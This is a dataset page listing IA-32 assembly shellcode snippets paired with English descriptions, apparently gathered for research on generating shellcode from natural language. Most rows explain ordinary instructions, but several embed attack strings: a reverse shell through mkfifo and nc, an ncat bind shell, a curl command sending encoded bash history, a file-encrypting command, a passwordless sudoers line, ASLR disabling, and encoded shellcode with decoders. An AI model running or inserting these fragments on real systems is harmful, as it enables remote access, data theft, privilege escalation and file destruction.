OSS-forge/Extended_Shellcode_IA32
Shellcode_IA32 Shellcode_IA32 is a dataset containing more than 20 years of shellcodes from a variety of sources and is the largest collection of shellcodes in assembly available to date. We are currently extending the dataset. Up to now, we released three versions of the dataset. Shellcode_IA32 was presented for the first time in the paper Shellcode_IA32: A Dataset for Automatic Shellcode Generation, accepted to the 1st Workshop on Natural Language Processing for Programming… See the full description on the dataset page: https://huggingface.co/datasets/OSS-forge/Extended_Shellcode_IA32.
1033
1SNIPPETS INTENTS
2_appendfile: declare appendfile_label
3_appendfile: define the _appendfile label
4_build: declare _build label
5_build: define the _build label
6_child: define the _child label
7_close: declare _close label
8_close: define the _close label
9_cmd: define _cmd label
10_cmd: declare _cmd register
11_cmd: define the _cmd label
12_continue: define the _continue label
13_decoder: define _decoder_label
14_dup2_loop: define _dup2_loop label
15_dup2_loop: define the _dup2_loop label
16_egg: define the _egg label
17_exec: declare _exec _label
18_exec: define _exec label
19_exec: declare _exec label
20_exec: define the _exec label
21_execline: define _execline label
22_execline: define the _execline label
23_exit: define _exit label
24_exit: define the _exit label
25_file: _declare _file label
26_file: define _file_label
27_file: define the _file label
28_ip equ 0x0100007f define ip address as _ip = 0x0100007f
29_ip equ 0x0100007f define ip equal to 0x0100007f
30_isegg: define the _isegg label
31_load_data: define _load_data label
32_load_data: define the _load_data label
33_next: define the _next label
34_param: declare _param label
35_param: define the _param label
36_params: define _params label
37_params: define the _params label
38_parent_read: define the _parent_read label
39_parent: define the _parent label
40_random: define _random label
41_random: define the _random label
42_read: define _read label
43_return: define the _return label
44_setsockopt: define the _setsockopt label
45_shell: define the _shell label
46_socket: define the _socket label
47_start: declare _start label
48_start: _start function
49_start: _start label
50_start: _start
51_start: define the _start label
52_start: \n jmp call_decoder define the _start label and jump short to the call_decoder
53_start: \n jmp call_decoder define the _start label and jump to the call_decoder
54_start: \n jmp call_decoder define the _start label and jump to call_decoder
55_start: \n jmp short call_decoder define the _start label and jump short to the call_decoder
56_start: \n jmp short call_decoder define the _start label and jump short to call_decoder
57_start: \n jmp short call_shellcode define the _start label and jump short to the call_shellcode
58_start: \n jmp short call_shellcode define the _start label and jump short to call_shellcode
59_start: \n jmp short call_shellcode define the _start label and jump short to call_shellcode label
60_start: \n jmp short enc define the _start label and jump short to enc
61_start: \n jmp short stage define the _start label and jump short to stage
62_user: declare _user label
63_user: define the _user label
64_while_loop: define the _while_loop label
65_write: declare _write label
66_write: define _write label
67_write: define the _write label
681: define the numeric label 1
691: define the label 1
702: define the label 2
712: define the numeric label 2
723: define the label 3
733: define the numeric label 3
74a_letter db 'd' allocate one byte of memory for a_letter variable and initialize it to 'd'
75aas correct the result od the previous unpacked decimal substraction in al register
76adc eax, 0x9c09ebea sum hexadecimal value 0x9c09ebea with eax register. if cf is set, add 1 to eax.
77add [ebp-4], esi add esi into memory address ebp-4
78add ah, bh add the contents of the bh register into the ah register
79add al, 0x2 add 0x2 to al
80add al, 0x25 add 0x25 to the al register
81add al, 0x3 add 0x3 to the contents in al and save the result in al
82add al, 0x33 add 0x33 to the contents in al and save the result in al
83add al, 0x40 add 0x40 to the al register
84add al, 0x66 add 0x66 to the contents in al and save the result in al
85add al, 0xa add 0xa to the al register
86add al, 0xb add 0xb to the al register
87add al, 2 add 2 to al register
88add al, 2 add the value 2 to the contents of the al register
89add al, 3 add 3 to al register
90add al, 3 add 3 to al
91add al, byte '0' add byte '0' to al
92add al, byte [edi] add the byte in edi to the al register
93add al,0x2 add hexadecimal value 0x2 to al register
94add al,0x3 add the value 0x3 into al register
95add al,0x33 add the hexadecimal value 0x33 to al register
96add al,0x3b add hexadecimal value 0x3b to al register
97add al,0x66 add the hexadecimal value 0x66 to al register
98add ax, [di + 20] add memory[di + 20] to ax
99add ax, 01 add 01 to ax
100add ax, bx add the contents of bx into ax
101add bl, 0x2 load jexadecimal value 0x2 into bl register
102add bl, 0x2 add 2 to bl content
103add bl, 0x2 add 0x2 to the contents in bl and save the result in bl
104add bx, ax add ax to bx
105add byte [edi], 0x4 \n not byte [edi] add 0x4 from the byte at the address edi and negate the result
106add byte [edi], 7 \n not byte [edi] add the byte at the address edi after subtracting the value 7
107add byte [edi], 8 \n not byte [edi] add the value 8 from the byte in edi and negate it
108add byte [esi], 0x02 add 0x02 to the current byte in esi
109add byte [esi], 0x1 \n not byte [esi] add 0x1 from the current byte of the shellcode and negate the result
110add byte [esi], 0x1 \n not byte [esi] add 0x1 from the byte at the address esi and negate the result
111add byte [esi], 0x10 add 0x10 to the current byte in esi
112add byte [esi], 0x9 \n not byte [esi] add the value 0x9 from the current byte of the shellcode and then negate the result
113add byte [esi], 2 adds 2 to the first character pointed from esi
114add byte [esi], 2 add the byte value 2 to the esi register
115add byte [esi], 2 \n not byte [esi] negate the byte at the address esi after adding the value 2
116add byte [esi], 3 \n not byte [esi] add the value 3 from the byte in esi and negate it
117add byte [var], 10 add 10 to the single byte stored at memory address var
118add byte [var], 20 add 20 to the single byte stored at memory address var
119add byte [var], 30 add 30 to the single byte stored at memory address var
120add byte_value, 65 add an immediate operand 65 to byte_value
121add byte_value, dl add the register dl in the memory location byte_value
122add cl, 0x2 add 2 to counter
123add cl, 0x2 add 2 to counter cl
124add cl, 0x2 add 0x2 to the contents in cl and save the result in cl
125add cl, 0xb8 add 0xb8 to the cl register
126add dx, 0x1b add the value 0x1b into the dx register
127add dx, 0x2f2f add 0x2f2f to the contents in dx and save the result in dx
128add dx,0x1b add 27 to dx contents
129add dx,0x2f2f then add to it the hexadecimal value 0x2f2f.
130add eax, [ebp-4] add the contents of the local variable stored at ebp-4 into eax
131add eax, 0x10 add 0x10 to eax
132add eax, 0x12345678 add 0x12345678 to the contents in eax and save the result in eax
133add eax, 0x2d383638 add 0x2d383638 to the contents in eax and save the result in eax
134add eax, 0x2d383638 \n push eax push ÔhmodÕ on stack
135add eax, 0x31179798 add 0x31179798 to the contents in eax and save the result in eax
136add eax, 0x5 \n jnz L2 add 0x5 to edx and jump to L2 if the result is not 0
137add eax, 0x7 \n jnz L4 add the value 0x7 to eax and jump to the label L4 if the sum is not zero
138add eax, 1 \n jnz L1 add 1 to ebx and jump to L1 if the result is not zero
139add eax, 10 add 10 to eax
140add eax, 10 add 10 to the contents of eax
141add eax, 16 add 16 to eax
142add eax, 2 add 2 to the contents of the eax register
143add eax, 2 add 2 to the eax register
144add eax, 2 add decimal 2 to eax register
145add eax, 24 add 24 to eax
146add eax, 3 \n jnz L3 add 3 to ecx and jump to L3 if the sum is not zero
147add eax, 4 add 4 to eax
148add eax, 4 \n jnz decode add 4 to eax and jump to decode if the result is not zero
149add eax, 40000h add 40000h to eax register
150add eax, 48 add decimal 48 to eax
151add eax, 48 add 48 to eax
152add eax, 9 \n jnz decode add the value 9 to eax and jump to decode if the result is not zero
153add eax, c add c to eax
154add eax, ebx add the contents of ebx to the contents of eax
155add eax, ebx add the value on ebx to eax
156add eax, ebx add ebx to eax
157add eax, ebx add ebx to eax and store the result in eax
158add eax, edx add edx to eax
159add eax, edx add the contents of edx to the contents of eax
160add eax, edx add the contents of the edx register to the contents of eax register
161add eax, esi add the contents of esi to the contents of eax
162add eax, esi add the contents of the esi register to the contents of eax register
163add eax,0xe458376a add hexadecimal value 0xe458376a to eax register
164add ebp, 0x2 add 0x2 to the contents of ebp
165add ebp, 0x2 add 0x2 to ebp
166add ebx, 0x2 save sys_connect = 3 into ebx register
167add ebx, 0x2 add 0x2 to the contents in ebx and save the result in ebx
168add ebx, 16 add 16 to ebx
169add ebx, 2 add decimal integer 2 to ebx
170add ebx, 2 add 2 to the contents of the ebx register
171add ebx, 24 add 48 to ebx
172add ebx, 3 add the value 3 to the content of ebx register
173add ebx, 3 add 3 to the contents of the ebx register
174add ebx, 5 add decimal integer 5 to ebx
175add ebx, ecx add ecx to ebx
176add ebx,2 add 2 to ebx content
177add ecx, 1 add the value 1 into the ecx register
178add ecx, 16 add 16 to ecx
179add ecx, ebx add ebx to ecx
180add edi, 2 add 2 to edi
181add edi, 37 add 37 to edi contents
182add edi, edi add the contents of edi to the contents of edi
183add edi, edi add the contents of the edi register to the contents of edi register
184add edi,0x11111111 add hexadecimal value 0x11111111 to edi content
185add edx, 16 set edx to next 16 byte block
186add edx, 32 add 32 to edx
187add edx, 48 add 48 to edx
188add edx, 64 add the value 64 to the content of edx register
189add edx, 64 add 64 to the contents of the edx register
190add edx, eax add the contents of eax to the contents of edx
191add edx, eax add the contents of the eax register to the contents of edx register
192add edx, eax add the contents of the eax register to the edx register
193add edx, ecx add ecx to edx
194add edx,ebx add ebx content to edx
195add esi, 0x21354523 add 0x21354523 to the contents in esi and save the result in esi
196add esi, 0x21354523 add 0x21354523 to the contents of esi
197add esi, 0x30 add hexadecimal value 0x30 to esi content
198add esi, 0x30 add 0x30 to esi
199add esi, 0x33333333 add the hexadecimal value 0x33333333 at esi content
200add esi, 0x33333333 add 0x33333333 value to esi
201add esi, 0x3f3f3f3f add 0x3f3f3f3f to the contents in esi and save the result in esi
202add esi, 0x8 add 0x8 to esi
203add esi, 0x8 "make esi point to next 8bytes of ""shellcode"""
204add esi, 2 add 2 to the contents of esi
205add esi, 4 add 4 to the contents of the esi register
206add esi, 4 add 4 to esi
207add esi, eax set the mem addr dinamically
208add esi, eax add the contents of the eax register to the contents of esi register
209add esi, eax add eax to esi
210add esi,4 scan the next section of mem
211add esp, 0x20 add 0x20 to the contents in esp and save the result in esp
212add esp, 3 add 3 to the contents of esp
213add esp, 3 add 3 to the contents of the esp register
214add esp, 4 add 4 to the esp register
215add marks, 10 add 10 to the variable marks
216addr: db 0x1 define addr = db 0x1
217addr: db 0x1 define the byte addr and initialize it to 0x1
218all: define _all label
219all: define the all label
220an_integer dd 12425 define the doubleword an_integer and initialize it to 12425
221and al, 0fh perform a logical and operation between the al register and the 0fh value and store the result in the al register
222and ax, 1 perform logical and between ax and 1
223and eax, 0000000fh mask out lowest 4 bits of the eax register
224and eax, 0fh clear all but the last 4 bits of eax
225and eax, 3f465456 perform and operation between eax and 3f465456 and save the result in eax
226and eax, 40392b29 perform and operation between eax and 40392b29 and save the result in eax
227and ebx, 0000000fh mask out lowest 4 bits of the ebx register
228and ecx, 0000000fh mask out lowest 4 bits of the ecx register
229and ecx,dword ptr [eax-0x7] anding the double word at the adress eax-0x7 and ecx register
230and ecx,dword ptr [ebx+0x1a] anding the double word at the adress ebx+0x1a and ecx register
231and edx, 0000000fh mask out lowest 4 bits of the edx register
232and mask1, 128 perform and operation on the variable mask1 and 128
233arr dd 100 define the doubleword arr and initialize it to 100
234arr dd 50 define the doubleword arr and initialize it to 50
235arr1 resb 400 reserve the array arr1 of 400 uninitialized bytes
236array dd 20 define the doubleword arr and initialize it to 20
237array word 20 define an array of 20 initialized word
238array word 5 define an array of 5 initialized word
239aslr_file: define _aslr_file label
240b: dd 0x0 create variable b in memory and initialize to zero
241big_number dd 123456789 define the doubleword variable big_number and initialize it to 123456789
242bignum: resw 1 reserve 1 word at location bignum
243bound ebp,qword ptr [ecx+0x6e] perform a bound check to array index
244bound ebp,qword ptr [edx-0x55915597] perform a bound check to array index
245bound esp,qword ptr [ebx+0x41] perform a bound check to array index
246buffer: resb 64 reserve 64 bytes for buffer
247buffersize: dw 1024 declare buffersize to be a word containing 1024
248byte_table db 14, 15, 22, 45 define a tables of bytes byte_table and initialize to 14, 15 and 22
249byte_value db 150 define the byte value byte_value and initialize it to 150
250bytes db 10 define the byte value bytes and initialize it to 10
251bytes db 20 define the byte value bytes and initialize it to 20
252call _appendfile call the _appendfile function
253"call _appendfile \n msg2 db ""passwd"", 0x00" jump to _appendfile label after putting the address of the next istruction on the top pf the stack
254call _build call the _build function
255"call _build \n msg db ""curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -x post"", 0x0a" push the address of msg on the top of the stack, and then change the eip to the address in _build label
256call _continue call _continue
257call _continue call the _continue function
258call _exec jump to _exec label
259call _exec call the _exec function
260"call _exec \n msg db ""mv test.txt .test.txt && head -c 32 /dev/urandom | base64 | openssl aes-256-cbc -e -in .test.txt -out test.txt -pbkdf2 -k - && rm .test.txt"", 0x0a" push the address of message on the top of the stack, and then change the eip to the address in _exec label
261call _exit call _exit
262call _malloc call _malloc
263call _myfunc call the _myfunc function
264call _params call the _params function
265"call _params \n string db ""test.txt""" push the address of test.txt on the top of the stack, and then change the eip to the address in _params label
266call _printf call the _printf function
267call _write call the _write function
268"call _write \n google: db ""127.1.1.1 google.com""" go to _write label after entering google address on the top of the sack
269call [esp] push the current code location on stack and the perform an unconditional jumo to the code location indicated by esp content
270call [esp] execute decoded_shellcode
271call [esp] call the function in esp
272call atoi call the atoi function
273call code call the code function
274"call code \n file: db ""/sbin/iptables#-f""" "push the address of file: db ""/sbin/iptables#-f"" on the top of the stack, and then change the eip to the address in code_label"
275call cont call the cont function
276call cont \n db '0',10 go to _cont after entering db '0',10 adress on the top of the stack
277call decoder jump to _decoder label
278call decoder go to _decoder label
279call decoder go to deocder label
280call decoder jump to decoder_label
281call decoder call the function decoder
282call decoder call the decoder function
283call decoder call decoder
284call decoder \n encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539 jump to _decoder label after saving encoded_shellcode ' dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539' pointer to esi
285call decoder \n encoded: dw 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539 jump to decoder_label after entering the double word string encoded '0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539' on stack
286call decoder \n encodedshellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce push the address of encodedshellcode on the top of the stack, and then change the eip to the address in _shellcode label
287call decoder \n encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94, 0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87 jump to _decoder label after entering _encodedshellcode (db db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87) on the top of the stack
288call decoder \n shellcode: db 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87 go to _decoder label after entering the address of the array shellcode (0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87) on the top of the stack
289call decoder \n shellcode: db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d go to _decoder label after entering shellcode (db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d) address on the top of the stack
290call decoder \n shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23 \n shellcodelen equ $-shellcode shellcode address will be pushed into the stack
291call decoder \n shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01 go to _decoder label after entering shellcode Ô0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01Õ on the top of the stack
292call decoder \n xor dword ptr [edx-0x55af5540],ebp xoring ebp content with the double word at the adress edx-0x55af5540 then go to decoder label
293call decoder_setup call decoder_setup
294call decoder1 \n xor_value: db 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa \n rot_value: db 13, 13, 13, 13, 13, 13, 13, 13 \n shellcode: db 0x94,0x67,0xf7,0xdf,0x96,0x96,0x2a,0xdf,0xdf,0x96,0xc5,0xdc,0xd1,0x3c,0x5a,0xf7,0x3c,0x45,0xca,0x3c,0x44,0x17,0xb2,0x70,0x27 jump to decoder1_label afetr entering xor_value, rot_value and shellcode on the top pf the stack
295call doit call the doit function
296call egghunter go to egghunter
297call egghunter call the egghunter function
298call esi call esi
299call esi call the function in esi
300call esp call esp
301call execute call the execute function
302"call execute \n db ""cp /bin/sh /tmp/shÓ" "put db ""cp /bin/sh /tmp/shÓ address on stack then jump to _esecute label"
303call internetreadfile call function internetreadfile
304call iprint call the iprint function
305call iprintlf call the iprintlf function
306call jmp_search call jmp_search
307call jmp_search call the jmp_search function
308call loader call loader
309call loader call the loader function
310call main call the main function
311call me call the me function
312call my_subroutine call my_subroutine
313call near stageaddress call near stageaddress
314call near stageaddress call the near function
315call one call the one function
316"call one \n string: db ""/etc/passwd""" "push the address of string: db ""/etc/passwd"" on the top of the stack, and then change the eip to the address in one_label"
317call open jump to open_label
318call prepare call the prepare function
319call prepare \n db ',ajm,pk#########' go to prepere after storing string on the stack
320call quit call the quit function
321call returnlabel call returnlabel
322call set_argv call set_argv
323call set_argv call the set_argv function
324"call set_argv \n cmd: db ""cat /etc/passwd;echo do__ne""" "go to _set_argv label afeter entering the byte string cmd = cat /etc/passwd;echo do__ne on stack"
325call shell_ret call the shell_ret function
326call shell_ret \n db Ò/bin/shÓ go to shell_ret label after ebtering byte string Ò/bin/shÓ address on stack
327call shellcode jump to the address of shellcode_label
328call shellcode call the shellcode function
329call shellcode \n db '/proc/sys/kernel/randomize_va_space' go to _shellcode label after entering the address of the string = Ô/proc/sys/kernel/randomize_va_space' on the top of the stack
330call shellcode \n db '/proc/sys/kernel/randomize_va_spacex' go to _shellcode label after entering the byte string '/proc/sys/kernel/randomize_va_spacex' address on stack
331call shellcode \n db 'my.txtx' go to _shellcode label after entering the byte string Ômt.txtxÕ address on the top of the stack
332"call shellcode \n message db ""/bin/sh""" push the address of /bin/sh on the top of the stack, and then change the eip to the address in shellcode_label
333call shellcode \n port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 go to shellcode label after entering port: db db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 address on stack
334call shellcode db '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd' jump to shellcode_label after entering the byte string '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd' on the top of the stack
335call sprint call the sprint function
336call sprintlf call the sprintlf function
337call start call the start function
338call strlen call the strlen function
339call two call the two function
340call write go to _write label
341call write call the write function
342"call write \n db ""all all=(all) nopasswd: all"" , 0xa" "entring db ""all all=(all) nopasswd: all"" , 0xa address on stack, then jump to _write label"
343call writestring call writestring
344call writestring call the writestring function
345"call writestring \n db ""rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | /bin/nc localhost 9999 > /tmp/fr""" "go to _writestring label after entering the byte string ""rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | /bin/nc localhost 9999 > /tmp/fr"" address on the top of the stack"
346call_decoded: define call_decoded_label
347call_decoded: define the call_decoded label
348call_decoded: \n call [esp] define call_decoded and execute it
349call_decoder: declare _call_decoder label
350call_decoder: define _call_decoder label
351call_decoder: define call_decoder label
352call_decoder: define call_decoder_label
353call_decoder: define call_decoder function
354call_decoder: define call_decoder
355call_decoder: call_decoder label
356call_decoder: define the call_decoder label
357call_decoder: \n call decoder define call_decoder and call decoder function
358call_decoder: \n call decoder define the call_decoder label and call the decoder function
359call_decoder: \n call decoder define call_decoder and call decoder
360call_decoder: \n call decoder \n shellcode: db 0xeb,0x25,0x5e,0x31,0xc9,0xb1,0x1e,0x80,0x3e,0x07,0x7c,0x05,0x80,0x2e,0x07,0xeb,0x11,0x31,0xdb,0x31,0xd2,0xb3,0x07,0xb2,0xff,0x66,0x42,0x2a,0x1e,0x66,0x29,0xda,0x88,0x16,0x46,0xe2,0xe2,0xeb,0x05,0xe8,0xd6,0xff,0xff,0xff,0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87 in the function call_decoder call the decoder routine and define shellcode as array of bytes 0xeb,0x25,0x5e,0x31,0xc9,0xb1,0x1e,0x80,0x3e,0x07,0x7c,0x05,0x80,0x2e,0x07,0xeb,0x11,0x31,0xdb,0x31,0xd2,0xb3,0x07,0xb2,0xff,0x66,0x42,0x2a,0x1e,0x66,0x29,0xda,0x88,0x16,0x46,0xe2,0xe2,0xeb,0x05,0xe8,0xd6,0xff,0xff,0xff,0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87
361call_egghunter: define call_egghunter label
362call_egghunter: define the call_egghunter label
363call_shellcode: declare _call_shellcode label
364call_shellcode: declare call_shellcode_label
365call_shellcode: define call_shellcode_label
366call_shellcode: delcare call_shellcode_label
367call_shellcode: define call_shellcode label
368call_shellcode: define call_shellcode function
369call_shellcode: call_shellcode function
370call_shellcode: call_shellcode routine
371call_shellcode: declare the call_shellcode label
372call_shellcode: define the call_shellcode label
373call_shellcode: \n call decoder define the call_shellcode label and call the decoder function
374call_shellcode: \n call decoder define the call_shellcode function and call decoder
375call_shellcode: \n call decoder define call_shellcode and call decoder function
376call_shellcode: \n call decoder in call_shellcode call the decoder function
377call_shellcode: \n call decoder in call_shellcode execute the decoder routine
378call_write: define _call_write label
379call_write: define the call_write label
380callit: define the callit label
381callme: define the callme label
382callpop: define _ callpop label
383callpop: define the callpop function
384callpop: define the callpop label
385cdq convert the doubleword with sign (32 bit) provided in eax into the quadword with sign (64 bit) left in edx:eax
386cdq convert the doubleword with sign (32 bit) provided in eax into the quadword with sign (64 bit) left in edx:eax (clear eax and edx registers)
387cdq zero out edx using the sign bit from eax
388cdq save edx as a null byte
389cdq convert signed dword in eax to a signed quad word in edx:eax
390cdq set edx to 0
391cdq edx to 0
392cdq set edx = 0
393cdq overwriting edx with either 0
394cdq zero out edx
395cdq clear the edx register
396cdq extend the sign bit of the eax register into the edx register
397cdq extend the sign bit of eax register into the edx register
398cdq extend the sign bit of eax into the edx register
399cdq \n mov ecx, edx zero out edx and ecx regsiter
400cdq \n push edx zero out edx and push ortocol id = 0 on stack
401check_even_odd: define check_even_odd label
402check_even_odd: define check_even_odd
403check_even_odd: define check_even_odd function
404child: define the child function
405child: define the child label
406chmod_call equ 15 define chmod_call =15
407chmod_call equ 15 define chmod_call equal to 15
408choice db 'y' define variable choice of 1 byte and initialize to y
409cld clear the direction flag
410cld clear direction flag increasing si and di index registers.
411cld set the direction flag to zero
412cld direction flag equal to zero
413cli clear interrupt flag
414close_syscall equ 6 define close_syscall=6
415close_syscall equ 6 define close_syscall equal to 6
416close: define close_label
417closefile: define _closefile label
418closefile: define the closefile function
419closefile: define the closefile label
420cmd: define _cmd label
421cmd: define the cmd label
422cmd: db 'cat /etc/passwd' declare cmd string and initialize it to 'cat /etc/passwd'
423cmd: db 'cat /etc/passwd' define cmd as the byte string 'cat /etc/passwd'
424cmp [ebp+arg_0], 1 compare the contents stored at ebp+arg_0 with 1
425cmp [ebp+var_a], 0 compare if the contents at memory location ebp+var_a is 0
426cmp [ebp+var_a], 0 compare the contents at memory location ebp+var_a with 0
427cmp [ebp+var_a], 0 \n jnz short loc_4010E5 jump short to the memory location loc_4010E5 if the contents of the memory address ebp+var_a is not equal to zero
428cmp [ebp+var_a], 0 \n jnz short loc_4010E5 if the contents of the memory address ebp+var_a is not equal to zero then jump short to the memory location loc_4010E5
429cmp [esi], edx compare the contents at memory location esi and the contents of the edx register
430cmp [esi], edx compare the contents at memory location esi with edx
431cmp al, 0x38 \n je 0x40 \n push byte 0x1 jump to the memory address 0x40 if the contents of the al register is equal to the value 0x38 else push the byte representation of the value 0x1 onto the stack
432cmp al, 0x38 \n je 0x40 \n push byte 0x1 if the contents of the al register is equal to the value 0x38 then jump to the memory address 0x40 else push the byte representation of the value 0x1 onto the stack
433cmp al, 0xaa \n je decode_insertion \n xor al, bl jump to the decode_insertion label if the contents of the al register is equal to the vale 0xaa else perform a logical xor operation between the al register and the bl register and store the result in the al register
434cmp al, 0xaa \n je decode_insertion \n xor al, bl if the contents of the al register is equal to the vale 0xaa then jump to the decode_insertion label else perform a logical xor operation between the al register and the bl register and store the result in the al register
435cmp al, 0xf2 if it return efault, bad address
436cmp al, 0xf2 compare if the contents of al with 0xf2
437cmp al, 0xf2 compare the contents of the al register and 0xf2
438cmp al, 0xf2 compare the contents of the al register with the value 0xf2
439cmp al, 0xf2 \n je _start jump to the _start label if the contents of the al register is equal to the value 0xf2
440cmp al, 0xf2 \n je _start if the contents of the al register is equal to the value 0xf2 then jump to the _start label
441cmp al, 0xf2 \n je _start \n mov eax, 0x50905090 jump to the _start label if the contents of the al register is equal to the value 0xf2 else move the value 0x50905090 into the eax register
442cmp al, 0xf2 \n je _start \n mov eax, 0x50905090 if the contents of the al register is equal to the value 0xf2 then jump to the _start label else move the value 0x50905090 into the eax register
443cmp al, 0xf2 \n je fillOnes jump to the fillOnes label if the contents of the al register is equal to the value 0xf2
444cmp al, 0xf2 \n je fillOnes if the contents of the al register is equal to the value 0xf2 then jump to the fillOnes label
445cmp al, 0xf2 \n je fillOnes \n mov eax, 0x59935193 jump to the fillOnes label if the contents of the al register is equal to 0xf2 else move the value 0x59935193 into the eax register
446cmp al, 0xf2 \n je fillOnes \n mov eax, 0x59935193 if the contents of the al register is equal to 0xf2 then jump to the fillOnes label else move the value 0x59935193 into the eax register
447cmp al, 0xf2 \n je next_page jump to the label next_page if the contents of the al register is equal to the value 0xf2
448cmp al, 0xf2 \n je next_page if the contents of the al register is equal to the value 0xf2 then jump to the label next_page
449cmp al, 0xf2 \n jz _start jump to the _start label if the contents of the al register is equal to the value 0xf2
450cmp al, 0xf2 \n jz _start if the contents of the al register is equal to the value 0xf2 then jump to the _start label
451cmp al, 0xf2 \n jz incpage if the contents of the al register is equal to the value 0xf2 then jump to the incpage label
452cmp al, 0xf2 \n jz incpage jump to the incpage label if the contents of the al register is equal to the value 0xf2
453cmp al, 0xf2 \n jz next_page verify if sys_access returned an efault, and if it matchs jump to next_page label
454cmp al, 9 \n jg l1 jump to the label l1 if the contents of the al register is greater than the decimal value 9
455cmp al, 9 \n jg l1 if the contents of the al register is greater than the decimal value 9 then jump to the label l1
456cmp al, 9 \n jge l1 jump to the label l1 if the contents of the al register is greater than or equal to the decimal value 9
457cmp al, 9 \n jge l1 if the contents of the al register is greater than or equal to the decimal value 9 then jump to the label l1
458cmp al, bl \n ja l2 \n add eax, 3 jump to the l2 label if the unsigned contents of the al register is greater than the unsigned contents of the bl register else add the value 3 to the eax register
459cmp al, bl \n ja l2 \n add eax, 3 if the unsigned contents of the al register is greater than the unsigned contents of the bl register then jump to the l2 label else add the value 3 to the eax register
460cmp al, bl \n jb l2 jump to the label l2 if the unsigned contents of the al register is lower than the unsigned contents of the bl register
461cmp al, bl \n jb l2 if the unsigned contents of the al register is lower than the unsigned contents of the bl register then jump to the label l2
462cmp al, cl compare the contents of al with the cl register
463cmp al, cl compare the contents of the al register and the contents of the cl register
464cmp al, cl \n jne short decode \n jmp shellcode if the contents of the al register is not equal to the contents of the cl register then jump short to the decode label else jump to the shellcode label
465cmp al, cl \n jne short decode \n jmp shellcode jump short to the decode label if the contents of the al register is not equal to the contents of the cl register else jump to the shellcode label
466cmp al, cl \n jnz short decode \n jmp shellcode check if reached the end of shellcode comparing cl with al register. if not return to _decode label else go to _shellcode label
467cmp al, cl \n jnz short decode \n jmp shellcode jump short to decode if al is not equal to cl else jump to shellcode
468cmp al,0xaa \n je decode_insertion if al regsiter content is equal to the hexadecimal value 0xaa jump to decode_insertion label
469cmp al,0xf2 \n jz _start if efault page alignment
470cmp ax, bx \n jne l3 jump to the l3 label if the contents of the ax register is not equal to the contents of the bx register
